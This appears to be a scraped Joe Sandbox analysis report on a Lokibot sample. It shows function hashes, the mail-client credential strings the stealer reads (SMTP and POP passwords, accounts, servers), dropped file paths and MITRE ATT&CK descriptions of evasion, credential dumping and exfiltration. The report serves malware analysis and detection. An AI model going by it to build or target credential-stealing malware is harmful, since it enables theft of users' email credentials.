VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

Technology, xrefs: 0040D08D
SmtpPort, xrefs: 0040D0EB
SmtpAccount, xrefs: 0040D0FA
PopAccount, xrefs: 0040D0B6
SmtpPassword, xrefs: 0040D117
PopPassword, xrefs: 0040D0D0
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7
EmailAddress, xrefs: 0040D074
SmtpServer, xrefs: 0040D0DC

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040549C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58

Function 004029D4 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2948416240.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2948398987.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948435894.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2948448472.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d81.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON